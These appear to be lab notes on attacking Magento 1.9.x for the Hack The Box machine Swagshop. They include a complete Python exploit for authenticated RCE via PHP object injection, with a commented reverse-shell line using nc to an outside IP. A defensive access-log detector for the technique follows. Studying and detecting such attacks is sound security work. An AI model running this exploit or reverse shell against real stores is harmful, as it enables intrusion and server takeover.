Magento

Magento is an ecommerce platform on which merchants build online stores to list and showcase their products.

Enumeration

  • magescan is an automated Magento scanner (the Magento counterpart of wpscan): it fingerprints the version and checks the basic configuration locations.

php magescan.phar scan:all http://swagshop.htb

Exploits

  • When Magento is version 1.9.1.0 CE / 1.14.1.0 EE and has not been patched with SUPEE-5344 (magescan enumerates the version and patch status), remote code execution is possible:

searchsploit -x 37977
  • This exploit creates an admin account in the Magento application, which can then be used to perform RCE as an authenticated user:

searchsploit -x 37811
  • The Python 3 version of 37811 is below; it worked fine for Swagshop (HTB):

#!/usr/bin/env python3
# Python 3 port of Exploit-DB 37811: Magento 1.9.x authenticated RCE through
# PHP object injection in the admin dashboard tunnel endpoint.
# Uses the pwntools 'log' helper for output; everything else is stdlib + requests.

from hashlib import md5
import sys
import re
import base64
import requests
from pwn import log

# Admin credentials (e.g. the account created by exploit 37977)
username = "forme"
password = "forme"
url = "http://swagshop.htb/index.php/admin"
# Burp listener for inspecting the traffic; drop proxies= below if nothing listens on 8080
proxy = {"http": "http://localhost:8080"}
data = {"login[username]": username,
        "login[password]": password}

#arg = 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.3 443 >/tmp/f'
arg = "whoami"
php_function = 'system'  # Note: we can only pass 1 argument to the function
install_date = b'Wed, 08 May 2019 07:23:09 +0000'  # This needs to be the exact date from /app/etc/local.xml

# POP chain to pivot into call_user_func: Zend_Log -> Zend_Log_Writer_Mail ->
# Zend_Config_Writer_Yaml, whose _yamlEncoder (php_function) is called with the
# Varien_Object _data (arg). The \00 bytes mark protected property names.
payload = 'O:8:\"Zend_Log\":1:{s:11:\"\00*\00_writers\";a:2:{i:0;O:20:\"Zend_Log_Writer_Mail\":4:{s:16:' \
          '\"\00*\00_eventsToMail\";a:3:{i:0;s:11:\"EXTERMINATE\";i:1;s:12:\"EXTERMINATE!\";i:2;s:15:\"' \
          'EXTERMINATE!!!!\";}s:22:\"\00*\00_subjectPrependText\";N;s:10:\"\00*\00_layout\";O:23:\"'     \
          'Zend_Config_Writer_Yaml\":3:{s:15:\"\00*\00_yamlEncoder\";s:%d:\"%s\";s:17:\"\00*\00'     \
          '_loadedSection\";N;s:10:\"\00*\00_config\";O:13:\"Varien_Object\":1:{s:8:\"\00*\00_data\"' \
          ';s:%d:\"%s\";}}s:8:\"\00*\00_mail\";O:9:\"Zend_Mail\":0:{}}i:1;i:2;}}' % (len(php_function), php_function,
                                                                                     len(arg), arg)
# session
log.info("Initializing the session")
session = requests.Session()

# Log in to the admin panel. The login form also answers 200 on a failed login,
# so this status check is weak; the ajaxBlockUrl lookup below only succeeds on
# the dashboard page, i.e. after a real login.
r = session.post(url=url, data=data, proxies=proxy)
if r.status_code == 200:
    log.success("Logged in as admin...")
else:
    log.error("Failed to login")

# Dashboard ajax block URL and CSRF form key, both embedded in the dashboard page
burl = re.search("ajaxBlockUrl = \'(.*)\'", r.text)
burl = burl.group(1)
# print(burl) # identifies block url and key
key = re.search("var FORM_KEY = '(.*)'", r.text)
key = key.group(1)
# print(key)
log.info("Identified block url and key")

# The orders tab embeds an <img src="...?ga="> whose base is the tunnel endpoint
dn = session.get(burl + 'block/tab_orders/period/1y/?isAjax=true', data='isAjax=false&form_key=' + key)
tunnel = re.search("src=\"(.*)\?ga=", dn.text)
tunnel = bytes(tunnel.group(1), 'utf-8')

# The tunnel checks h= against md5(ga + install date) before unserializing ga=
payload = base64.b64encode(bytes(payload, 'utf-8'))
gh = bytes(md5(payload + install_date).hexdigest(), 'utf-8')
exploit = tunnel + b'?ga=' + payload + b'&h=' + gh
log.info("Exploit constructed")
test_ = exploit.decode()
test = session.get(url=test_)
log.success("Successfully exploited...")
print(test.text)
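The script above delivers its gadget chain as a base64 ga= parameter to the admin dashboard tunnel endpoint, with an h= hash alongside it. From the defender's side, that leaves a distinctive trace in the web server access log. The following is an added example (it is not from the original notes, from the 37811 exploit author, or from Magento): it parses Combined Log Format lines, decodes the ga= parameter and flags any request whose value is a serialized PHP object, reporting the outermost class. The log lines, the /dashboard/tunnel/ path layout, the inert Zend_Log stand-in blob and the chart-parameter content of a legitimate tunnel call are all constructed or assumed for this example.

```python
#!/usr/bin/env python3
# Added example for these notes (not part of EDB 37811 or Magento): flag access-log
# requests whose ga= parameter base64-decodes to a serialized PHP object, the
# signature of the admin dashboard tunnel object-injection technique above.
# All sample log lines below are constructed for illustration.
import base64
import binascii
import re
from urllib.parse import unquote

# Combined Log Format request line: client IP, timestamp, method, target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Outermost serialized PHP object: O:<len>:"<class>":<n>:{ ...
PHP_OBJECT_RE = re.compile(rb'O:\d+:"([A-Za-z0-9_\\]+)":\d+:\{')


def parse_query(query: str) -> dict:
    """Split a raw query string without turning '+' into a space.

    urllib.parse.parse_qs would do that, which corrupts base64 values and
    makes the payload undecodable, so values are only percent-decoded here."""
    params = {}
    for pair in query.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        params[unquote(key)] = unquote(value)
    return params


def decode_b64(value: str):
    """Tolerant base64 decode: re-pad, return None for non-base64 input."""
    padded = value + "=" * (-len(value) % 4)
    try:
        return base64.b64decode(padded, validate=True)
    except (binascii.Error, ValueError):
        return None


def serialized_php_class(blob: bytes):
    """Return the class name if the blob holds a serialized PHP object, else None."""
    match = PHP_OBJECT_RE.search(blob)
    return match.group(1).decode("ascii", "replace") if match else None


def scan_log(text: str) -> list:
    """One finding per request whose ga= parameter carries a serialized PHP object."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        m = LOG_RE.match(line)
        if not m:
            continue
        path, _, query = m.group("target").partition("?")
        ga = parse_query(query).get("ga")
        if ga is None:
            continue
        blob = decode_b64(ga)
        if blob is None:
            continue  # not base64 at all: broken request, not this technique
        cls = serialized_php_class(blob)
        if cls:
            findings.append({"line": lineno, "ip": m.group("ip"), "path": path,
                             "class": cls, "status": m.group("status")})
    return findings


def _b64(raw: bytes) -> str:
    return base64.b64encode(raw).decode("ascii")


# Constructed sample traffic. The "malicious" blob is an inert stand-in with the
# same outer shape as the gadget chain (a Zend_Log object), not a working chain.
MALICIOUS_BLOB = b'O:8:"Zend_Log":1:{s:11:"\x00*\x00_writers";a:0:{}}'
# Assumption: a legitimate tunnel call carries base64-encoded chart parameters.
BENIGN_BLOB = b"cht=lc&chd=t:10,20,30&chs=587x300"
FAKE_HASH = "0" * 32  # placeholder for the md5 the exploit appends as h=

SAMPLE_LOG = "\n".join([
    '10.0.0.5 - - [08/May/2019:07:40:01 +0000] "GET /index.php/admin/dashboard/index/key/abc/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [08/May/2019:07:40:02 +0000] "GET /index.php/admin/dashboard/tunnel/key/abc/?ga=%s&h=%s HTTP/1.1" 200 32 "-" "python-requests/2.21.0"' % (_b64(MALICIOUS_BLOB), FAKE_HASH),
    '10.0.0.9 - - [08/May/2019:07:41:10 +0000] "GET /index.php/admin/dashboard/tunnel/key/abc/?ga=%s&h=%s HTTP/1.1" 200 4096 "-" "Mozilla/5.0"' % (_b64(BENIGN_BLOB), FAKE_HASH),
    '10.0.0.9 - - [08/May/2019:07:41:11 +0000] "GET /index.php/admin/dashboard/tunnel/key/abc/?ga=not%20base64!&h=x HTTP/1.1" 400 0 "-" "curl/7.64.0"',
])

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print("line %(line)d: %(ip)s sent serialized %(class)s to %(path)s (HTTP %(status)s)" % f)
```

Run it against a real access log by passing the file contents to scan_log(); the benign chart request and the non-base64 request produce no finding, only the serialized object does. Pairing a hit with a preceding admin login from an account nobody recognises (the 37977 pattern above) is the follow-up check worth making.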

Machine:

  • Swagshop - HTB
